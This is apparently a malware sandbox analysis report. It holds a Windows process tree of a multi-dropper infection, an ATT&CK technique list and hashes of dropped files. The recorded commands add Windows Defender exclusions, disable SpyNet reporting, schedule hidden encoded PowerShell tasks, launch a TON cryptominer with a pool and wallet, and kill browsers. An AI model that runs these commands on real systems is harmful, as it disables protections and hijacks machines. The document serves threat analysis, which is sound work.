C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2768 -s 452
3⤵
- Program crash
PID:1872

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2768 -s 444
3⤵
- Program crash
PID:4264

C:\Users\Admin\Pictures\Adobe Films\iJv7e5qhqW1GL9_OPheJLX93.exe
"C:\Users\Admin\Pictures\Adobe Films\iJv7e5qhqW1GL9_OPheJLX93.exe"
2⤵
- Executes dropped EXE
PID:1960

C:\Users\Admin\AppData\Local\Temp\7zSE6D3.tmp\Install.exe
.\Install.exe
3⤵
- Executes dropped EXE
PID:4288

C:\Users\Admin\AppData\Local\Temp\7zSFBF1.tmp\Install.exe
.\Install.exe /S /site_id "525403"
4⤵
- Executes dropped EXE
PID:4808

C:\Windows\SysWOW64\forfiles.exe
"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"
5⤵
PID:4340

C:\Windows\SysWOW64\cmd.exe
/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&
6⤵
PID:5108

\??\c:\windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32
7⤵
PID:2476

\??\c:\windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64
7⤵
PID:2520

C:\Windows\SysWOW64\forfiles.exe
"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"
5⤵
PID:5052

C:\Windows\SysWOW64\cmd.exe
/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&
6⤵
PID:5096

\??\c:\windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32
7⤵
PID:2332

\??\c:\windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64
7⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:3756

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "gMbxcFjhl" /SC once /ST 12:29:13 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
5⤵
- Creates scheduled task(s)
PID:1892

C:\Windows\SysWOW64\schtasks.exe
schtasks /run /I /tn "gMbxcFjhl"
5⤵
PID:4660

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "gMbxcFjhl"
5⤵
PID:960

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "booXbIzkEgfNdKvxAC" /SC once /ST 17:24:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\uOvKJyFirsYYYLVYA\GHoNhggtAPCruoj\cqcoUUH.exe\" j6 /site_id 525403 /S" /V1 /F
5⤵
- Creates scheduled task(s)
PID:5720

C:\Users\Admin\Pictures\Adobe Films\TaW1dZd0vST9cSDFMV3LKJG9.exe
"C:\Users\Admin\Pictures\Adobe Films\TaW1dZd0vST9cSDFMV3LKJG9.exe"
2⤵
- Executes dropped EXE
PID:3056

C:\Users\Admin\Pictures\Adobe Films\Roe2tQRQff1K37YWZQ83Djf0.exe
"C:\Users\Admin\Pictures\Adobe Films\Roe2tQRQff1K37YWZQ83Djf0.exe"
2⤵
PID:2428

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
3⤵
PID:1276

C:\Users\Admin\Pictures\Adobe Films\BRkdmCwbwCcbEIqUj2VoQd_V.exe
"C:\Users\Admin\Pictures\Adobe Films\BRkdmCwbwCcbEIqUj2VoQd_V.exe"
2⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:1900

C:\Users\Admin\AppData\Local\Temp\MaF1oZo_build.exe
"C:\Users\Admin\AppData\Local\Temp\MaF1oZo_build.exe"
3⤵
PID:3760

C:\Windows\bfsvc.exe
C:\Windows\bfsvc.exe -a TON --pool wss://eu1.stratum.ton-pool.com/stratum --user EQBsKp8noEuW33wQqKQHyWtn5FbbnbobCCUxMRHBXOEqFcyO
4⤵
PID:6052

C:\Windows\explorer.exe
C:\Windows\explorer.exe "easyminer_def" "Microsoft%20Basic%20Display%20Adapter" "Miner" "ton"
4⤵
PID:3516

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 3516 -s 236
5⤵
- Program crash
PID:4976

C:\Users\Admin\Pictures\Adobe Films\W9YQ67wVkEMzXb7t78erdLXI.exe
"C:\Users\Admin\Pictures\Adobe Films\W9YQ67wVkEMzXb7t78erdLXI.exe"
2⤵
- Executes dropped EXE
- Checks computer location settings
- Suspicious use of AdjustPrivilegeToken
PID:2216

C:\Users\Admin\AppData\Local\Temp\b1484dc4-ecb4-4b15-af1d-ef568122a8b4.exe
"C:\Users\Admin\AppData\Local\Temp\b1484dc4-ecb4-4b15-af1d-ef568122a8b4.exe"
3⤵
- Executes dropped EXE
PID:4260

C:\Users\Admin\Pictures\Adobe Films\IHznmwVbyPriG1Xy7TJe9c59.exe
"C:\Users\Admin\Pictures\Adobe Films\IHznmwVbyPriG1Xy7TJe9c59.exe"
2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:2120

C:\Users\Admin\Pictures\Adobe Films\IHznmwVbyPriG1Xy7TJe9c59.exe
"C:\Users\Admin\Pictures\Adobe Films\IHznmwVbyPriG1Xy7TJe9c59.exe"
3⤵
- Executes dropped EXE
PID:4848

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4848 -s 240
4⤵
- Program crash
PID:4460

C:\Users\Admin\Pictures\Adobe Films\RCWQt2d5JS6ee5AZKe2cP0aJ.exe
"C:\Users\Admin\Pictures\Adobe Films\RCWQt2d5JS6ee5AZKe2cP0aJ.exe"
2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:2532

C:\Windows\SysWOW64\cmd.exe
cmd.exe /c taskkill /f /im chrome.exe
3⤵
PID:2968

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im chrome.exe
4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4564

C:\Users\Admin\Pictures\Adobe Films\CmKEiSndszc2KPMxiQQ_f5o6.exe
"C:\Users\Admin\Pictures\Adobe Films\CmKEiSndszc2KPMxiQQ_f5o6.exe"
2⤵
- Executes dropped EXE
- Checks computer location settings
PID:3168

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c cmd < Affaticato.gif
3⤵
PID:4732

C:\Windows\SysWOW64\cmd.exe
cmd
4⤵
PID:4816

C:\Windows\SysWOW64\tasklist.exe
tasklist /FI "imagename eq BullGuardCore.exe"
5⤵
- Enumerates processes with tasklist
PID:3772

C:\Windows\SysWOW64\find.exe
find /I /N "bullguardcore.exe"
5⤵
PID:3700

C:\Users\Admin\Pictures\Adobe Films\UvffXCe4GH6_D4Yjybn4bLja.exe
"C:\Users\Admin\Pictures\Adobe Films\UvffXCe4GH6_D4Yjybn4bLja.exe"
2⤵
- Executes dropped EXE
PID:2868

C:\Users\Admin\Pictures\Adobe Films\eND2CfpOuVuEbusfP_NwJzn5.exe
"C:\Users\Admin\Pictures\Adobe Films\eND2CfpOuVuEbusfP_NwJzn5.exe"
2⤵
- Executes dropped EXE
PID:1880

C:\Users\Admin\Pictures\Adobe Films\EQJvLsG3NWwZFxScAIWfQOad.exe
"C:\Users\Admin\Pictures\Adobe Films\EQJvLsG3NWwZFxScAIWfQOad.exe"
2⤵
- Executes dropped EXE
PID:3016

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3016 -s 472
3⤵
- Program crash
PID:3456

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3016 -s 464
3⤵
- Program crash
PID:4000

C:\Users\Admin\Pictures\Adobe Films\nHunmtO8BfXl5SixFcuGgtWb.exe
"C:\Users\Admin\Pictures\Adobe Films\nHunmtO8BfXl5SixFcuGgtWb.exe"
2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:1320

C:\Users\Admin\Pictures\Adobe Films\nHunmtO8BfXl5SixFcuGgtWb.exe
"C:\Users\Admin\Pictures\Adobe Films\nHunmtO8BfXl5SixFcuGgtWb.exe"
3⤵
- Executes dropped EXE
PID:4908

C:\Users\Admin\Pictures\Adobe Films\P4G14v5bCo3CvSJgwYlWni8E.exe
"C:\Users\Admin\Pictures\Adobe Films\P4G14v5bCo3CvSJgwYlWni8E.exe"
2⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:384

C:\Users\Admin\Pictures\Adobe Films\qsIlM2N6g12QJPmeB6FzImDF.exe
"C:\Users\Admin\Pictures\Adobe Films\qsIlM2N6g12QJPmeB6FzImDF.exe"
2⤵
- Executes dropped EXE
PID:3408

C:\Users\Admin\Pictures\Adobe Films\VejznfQIjgNXIaBBkdWkFsWz.exe
"C:\Users\Admin\Pictures\Adobe Films\VejznfQIjgNXIaBBkdWkFsWz.exe"
2⤵
- Executes dropped EXE
PID:3460

C:\Users\Admin\Pictures\Adobe Films\fTvhTtcwwpfxNMCHzkonem8V.exe
"C:\Users\Admin\Pictures\Adobe Films\fTvhTtcwwpfxNMCHzkonem8V.exe"
2⤵
- Executes dropped EXE
PID:908

C:\Users\Admin\AppData\Local\Temp\is-1CDKT.tmp\fTvhTtcwwpfxNMCHzkonem8V.tmp
"C:\Users\Admin\AppData\Local\Temp\is-1CDKT.tmp\fTvhTtcwwpfxNMCHzkonem8V.tmp" /SL5="$30062,140518,56832,C:\Users\Admin\Pictures\Adobe Films\fTvhTtcwwpfxNMCHzkonem8V.exe"
3⤵
- Executes dropped EXE
- Loads dropped DLL
PID:4220

C:\Users\Admin\AppData\Local\Temp\is-HBOHH.tmp\RYUT55.exe
"C:\Users\Admin\AppData\Local\Temp\is-HBOHH.tmp\RYUT55.exe" /S /UID=2709
4⤵
- Executes dropped EXE
PID:3040

C:\Users\Admin\Pictures\Adobe Films\2AeqfVdC1CeXtqaXCBLd8d_K.exe
"C:\Users\Admin\Pictures\Adobe Films\2AeqfVdC1CeXtqaXCBLd8d_K.exe"
2⤵
- Executes dropped EXE
- Checks computer location settings
PID:4108

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Start-Sleep -s 19
3⤵
- Suspicious use of AdjustPrivilegeToken
PID:5112

C:\Users\Admin\AppData\Local\Temp\Yvoovimndprim.exe
"C:\Users\Admin\AppData\Local\Temp\Yvoovimndprim.exe"
3⤵
PID:5384

C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
3⤵
PID:3872

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 404 -p 2768 -ip 2768
1⤵
PID:4400

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 472 -p 3460 -ip 3460
1⤵
PID:4456

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 480 -p 1880 -ip 1880
1⤵
PID:4512

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 504 -p 228 -ip 228
1⤵
PID:4556

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 520 -p 3016 -ip 3016
1⤵
PID:4604

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 552 -p 3056 -ip 3056
1⤵
PID:4636

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 568 -p 3408 -ip 3408
1⤵
PID:4668

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 540 -p 1924 -ip 1924
1⤵
PID:4684

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 1620 -ip 1620
1⤵
PID:4256

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 480 -p 1880 -ip 1880
1⤵
PID:4936

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 608 -p 3056 -ip 3056
1⤵
PID:4968

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 628 -p 1620 -ip 1620
1⤵
PID:5056

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 580 -p 3408 -ip 3408
1⤵
PID:5032

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 568 -p 3460 -ip 3460
1⤵
PID:5000

C:\Windows\system32\fondue.exe
"C:\Windows\system32\fondue.exe" /enable-feature:NetFx3 /caller-name:mscoreei.dll
1⤵
PID:1020

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 504 -p 2768 -ip 2768
1⤵
PID:4240

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 588 -p 3016 -ip 3016
1⤵
PID:3100

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 420 -p 1924 -ip 1924
1⤵
PID:4564

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 564 -p 228 -ip 228
1⤵
PID:4796

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 600 -p 2120 -ip 2120
1⤵
PID:1324

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 648 -p 4848 -ip 4848
1⤵
PID:4668

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 544 -p 1924 -ip 1924
1⤵
PID:2488

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 540 -p 4908 -ip 4908
1⤵
PID:2916

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 488 -p 1924 -ip 1924
1⤵
PID:316

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 544 -p 1924 -ip 1924
1⤵
PID:4364

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 504 -p 4604 -ip 4604
1⤵
PID:180

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 468 -p 4604 -ip 4604
1⤵
PID:4312

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 684 -p 1924 -ip 1924
1⤵
PID:4692

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 724 -p 4604 -ip 4604
1⤵
PID:4588

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 528 -p 1924 -ip 1924
1⤵
PID:4844

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 736 -p 4604 -ip 4604
1⤵
PID:4692

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 716 -p 1924 -ip 1924
1⤵
PID:4460

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
1⤵
PID:2464

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 700 -p 4604 -ip 4604
1⤵
PID:2324

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmpAF72.tmp.bat""
1⤵
PID:1692

C:\Windows\system32\timeout.exe
timeout 5
2⤵
- Delays execution with timeout.exe
PID:4968

C:\ProgramData\BCleaner App\BCleaner Application.exe
"C:\ProgramData\BCleaner App\BCleaner Application.exe"
2⤵
PID:5568

C:\ProgramData\BCleaner App\BCleaner Umngr.exe
"C:\ProgramData\BCleaner App\BCleaner Umngr.exe"
2⤵
PID:5788

C:\Users\Admin\AppData\Local\Temp\BNZ.969F6E1586025F8exe
"C:\Users\Admin\AppData\Local\Temp\BNZ.969F6E1586025F8exe"
3⤵
PID:5484

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 700 -p 4976 -ip 4976
1⤵
PID:3944

C:\Windows\system32\rundll32.exe
rundll32.exe "C:\Users\Admin\AppData\Local\Temp\db.dll",global
1⤵
- Process spawned unexpected child process
PID:4176

C:\Windows\SysWOW64\rundll32.exe
rundll32.exe "C:\Users\Admin\AppData\Local\Temp\db.dll",global
2⤵
PID:2740

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2740 -s 600
3⤵
- Program crash
PID:5308

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 716 -p 2740 -ip 2740
1⤵
PID:5160

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 680 -p 4976 -ip 4976
1⤵
PID:3676

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -pss -s 696 -p 5184 -ip 5184
1⤵
PID:3020

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
1⤵
PID:5228

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -pss -s 708 -p 3516 -ip 3516
1⤵
PID:6072

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -pss -s 708 -p 4704 -ip 4704
1⤵
PID:1892

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Scheduled Task

T1053

Persistence

Modify Existing Service

T1031

Scheduled Task

T1053

Privilege Escalation

Scheduled Task

T1053

Defense Evasion

Modify Registry

T1112

Disabling Security Tools

T1089

Credential Access

Credentials in Files

T1081

Discovery

Query Registry

T1012

System Information Discovery

T1082

Process Discovery

T1057

Lateral Movement

Collection

Data from Local System

T1005

Exfiltration

Command and Control

Web Service

T1102

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751
MD5
54e9306f95f32e50ccd58af19753d929

SHA1
eab9457321f34d4dcf7d4a0ac83edc9131bf7c57

SHA256
45f94dceb18a8f738a26da09ce4558995a4fe02b971882e8116fc9b59813bb72

SHA512
8711a4d866f21cdf4d4e6131ec4cfaf6821d0d22b90946be8b5a09ab868af0270a89bc326f03b858f0361a83c11a1531b894dfd1945e4812ba429a7558791f4f

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751
MD5
926420e027229c64b389ec4dbf4d8474

SHA1
69f89f6a704b50fa221afaa231fd1f1789ef2dc9

SHA256
52bb3a0553bbbed70c22997bb61207829f743ad9d5d51a621fce3cbed36f657f

SHA512
7b304dff6deaae4cddd272bc19ad2dca291caadf1280ffc23bdc44eba06b113fe7db806e048cebd7678d3cba68a78f4a04c88a55a5b92cb1a6647aa8314a1a8e

Download Submit
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Affaticato.gif
MD5
a91c6de38b0f9ea9f613b62e78855165

SHA1
e8bb7269deb415fcbc0b417283f8bc89a6131e16

SHA256
46bc29a03060b1e64ff4c937ac7a9f404236a7b9a00aafea8d9e5574b1bc2896

SHA512
38a2e1d3d52fab38db79aef07f1e7e0c7bd3862e0bfe9fe934ee82aea9ff53bc1667760dcbd7ed8ad7c03cbbaa7c8a308455cd0eb6c449cf943344ecc6e3a583

Download Submit
C:\Users\Admin\AppData\Local\Temp\7zSE6D3.tmp\Install.exe
MD5
af09be06979117eb025e62bd0e1ab55a

SHA1
36ac1ee05fb291f077af9b24f35788b9506e3694

SHA256
7e7778f88c4879eb20fd1a2e445ad38dee840e9d6f2e5bf04596b609179c1383

SHA512
fd161ffd5388debc8a10a9f70176897c2533af6622583f8887819f73c856d26bc8a3a31a43ce1cde7ae46e5c2416708efcf3b95ed129525867d66c6932cce0b5

Download Submit
C:\Users\Admin\AppData\Local\Temp\7zSE6D3.tmp\Install.exe
MD5
af09be06979117eb025e62bd0e1ab55a

SHA1
36ac1ee05fb291f077af9b24f35788b9506e3694

SHA256
7e7778f88c4879eb20fd1a2e445ad38dee840e9d6f2e5bf04596b609179c1383

SHA512
fd161ffd5388debc8a10a9f70176897c2533af6622583f8887819f73c856d26bc8a3a31a43ce1cde7ae46e5c2416708efcf3b95ed129525867d66c6932cce0b5

Download Submit
C:\Users\Admin\AppData\Local\Temp\7zSFBF1.tmp\Install.exe
MD5
55686434ed5d9edcda8e5b437aa93bfc

SHA1
708661ba30ee806c6e14695127283d49b227cb6a

SHA256
0c41e45a7b895290ab3319cf4eb18e9556b4f1fd3c2bc9bea984ce88f2b4a933

SHA512
85a71510c9254bec1cdd0a85534cb208dd8fb1b8f909410542019e3f613d875c2db36906b06ec0ed9a3940c219b8868b366499cec80b535c7bdbfacc85a2c9c1

Download Submit
C:\Users\Admin\AppData\Local\Temp\7zSFBF1.tmp\Install.exe
MD5
55686434ed5d9edcda8e5b437aa93bfc

SHA1
708661ba30ee806c6e14695127283d49b227cb6a

SHA256
0c41e45a7b895290ab3319cf4eb18e9556b4f1fd3c2bc9bea984ce88f2b4a933

SHA512
85a71510c9254bec1cdd0a85534cb208dd8fb1b8f909410542019e3f613d875c2db36906b06ec0ed9a3940c219b8868b366499cec80b535c7bdbfacc85a2c9c1

Download Submit
C:\Users\Admin\AppData\Local\Temp\b1484dc4-ecb4-4b15-af1d-ef568122a8b4.exe
MD5
da7ad7dbaeba66e5c464e2c8a90e91b7

SHA1
2906d72efa155f5d5d54794ee970ebfe9e0d4cd0

SHA256
a89b66ce95d78792b7641a7eb8cd8d1dbbb78b4af1a09710f40e3ee49ffe349f

SHA512
326bf270f0d3aeee87715146510c308e42afb949dbf113b3a2f7376486b22445d8471df86639fd28704f6bf21589f0c6f2e8d12957757a0b6a63209363bac56a

Download Submit
C:\Users\Admin\AppData\Local\Temp\b1484dc4-ecb4-4b15-af1d-ef568122a8b4.exe
MD5
da7ad7dbaeba66e5c464e2c8a90e91b7

SHA1
2906d72efa155f5d5d54794ee970ebfe9e0d4cd0

SHA256
a89b66ce95d78792b7641a7eb8cd8d1dbbb78b4af1a09710f40e3ee49ffe349f

SHA512
326bf270f0d3aeee87715146510c308e42afb949dbf113b3a2f7376486b22445d8471df86639fd28704f6bf21589f0c6f2e8d12957757a0b6a63209363bac56a

Download Submit
C:\Users\Admin\AppData\Local\Temp\is-1CDKT.tmp\fTvhTtcwwpfxNMCHzkonem8V.tmp
MD5
ffcf263a020aa7794015af0edee5df0b

SHA1
bce1eb5f0efb2c83f416b1782ea07c776666fdab

SHA256
1d07cfb7104b85fc0dffd761f6848ad176117e146bbb4079fe993efa06b94c64

SHA512
49f2b062adfb99c0c7f1012c56f0b52a8850d9f030cc32073b90025b372e4eb373f06a351e9b33264967427b8174c060c8a6110979f0eaf0872f7da6d5e4308a

Download Submit
C:\Users\Admin\AppData\Local\Temp\is-HBOHH.tmp\RYUT55.exe
MD5
442b6bc7905368e2155b824c6a4a2f8f

SHA1
a4a0878743f65efb796e6af363055e4fcca83705

SHA256
85db5c4a2c823e902f8ce5c051a746701f09532bfd7eeca1fae9f640c036967e

SHA512
fffcac2f70a1df564e90b6cba6a446cbdce545c316c4472ca4f469cefb23368929e692d2803ecc41f33bf68b1823b3349a81db2cd42ba8417ca485853428e0f2

Download Submit
C:\Users\Admin\AppData\Local\Temp\is-HBOHH.tmp\RYUT55.exe
MD5
442b6bc7905368e2155b824c6a4a2f8f

SHA1
a4a0878743f65efb796e6af363055e4fcca83705

SHA256
85db5c4a2c823e902f8ce5c051a746701f09532bfd7eeca1fae9f640c036967e

SHA512
fffcac2f70a1df564e90b6cba6a446cbdce545c316c4472ca4f469cefb23368929e692d2803ecc41f33bf68b1823b3349a81db2cd42ba8417ca485853428e0f2

Download Submit
C:\Users\Admin\AppData\Local\Temp\is-HBOHH.tmp\idp.dll
MD5
8f995688085bced38ba7795f60a5e1d3

SHA1
5b1ad67a149c05c50d6e388527af5c8a0af4343a

SHA256
203d7b61eac96de865ab3b586160e72c78d93ab5532b13d50ef27174126fd006

SHA512
043d41947ab69fc9297dcb5ad238acc2c35250d1172869945ed1a56894c10f93855f0210cbca41ceee9efb55fd56a35a4ec03c77e252409edc64bfb5fb821c35

Download Submit
C:\Users\Admin\Documents\lGv56tg4TRxz0XFPeWymU9pO.exe
MD5
68658cac51a3ee725891799aac339613

SHA1
8a00543b1af0d4ab8f130bc66d2a4a0b2d33cb0f

SHA256
e96bffaf47466cbe75dcf428e6644292c49af8db919bfbcf6d5797cb0eeef35d

SHA512
231a5517b22101dfd33295f294cedf32626a8586d1fa762cae783d779e551a3dfe5a6f972184ebcc1a832783b4fd51ce57965aee50d089a9c6e6e1256e2a9a63

Download Submit
C:\Users\Admin\Documents\lGv56tg4TRxz0XFPeWymU9pO.exe
MD5
68658cac51a3ee725891799aac339613

SHA1
8a00543b1af0d4ab8f130bc66d2a4a0b2d33cb0f

SHA256
e96bffaf47466cbe75dcf428e6644292c49af8db919bfbcf6d5797cb0eeef35d

SHA512
231a5517b22101dfd33295f294cedf32626a8586d1fa762cae783d779e551a3dfe5a6f972184ebcc1a832783b4fd51ce57965aee50d089a9c6e6e1256e2a9a63

Download Submit
C:\Users\Admin\Pictures\Adobe Films\00rjOb6UEQkAFotzj0Q_HOOe.exe
MD5
b01388d4e953b031469908bbb3868e0e

SHA1
015bcd0c22a8fad6f5c89f50837a803d768579b9

SHA256
236d31946a66aff8e69e362697a186141f5554e332a79f96b7914d98830f5420

SHA512
719f20b58c8248be441a676e29b9dc947e1bd3a517bf57089a65b959aac38b705ee96c3999f18d2aef281bac30b95b9c861ddd0494db996106b17327b53eb5cb

Download Submit
C:\Users\Admin\Pictures\Adobe Films\00rjOb6UEQkAFotzj0Q_HOOe.exe
MD5
b01388d4e953b031469908bbb3868e0e

SHA1
015bcd0c22a8fad6f5c89f50837a803d768579b9

SHA256
236d31946a66aff8e69e362697a186141f5554e332a79f96b7914d98830f5420

SHA512
719f20b58c8248be441a676e29b9dc947e1bd3a517bf57089a65b959aac38b705ee96c3999f18d2aef281bac30b95b9c861ddd0494db996106b17327b53eb5cb

Download Submit
C:\Users\Admin\Pictures\Adobe Films\2AeqfVdC1CeXtqaXCBLd8d_K.exe
MD5
f4294bf309d77f805bb1c6ba9c2cca24

SHA1
18da4b8cf3380e885da82f3b4b63371d61fdb48d

SHA256
5f44c6ad53c72d53df0db6d4cdeae29fb71de9ec0f34a44c35e35736e15924a2

SHA512
8b4d8dbf630d04e45fb68666cee3ef9abd7461e727f9ceaed444c231d427f83721ca270d35237f5fde8ba6f4f3d9522e1411ef6c51c08f5dab112456f293fce1

Download Submit
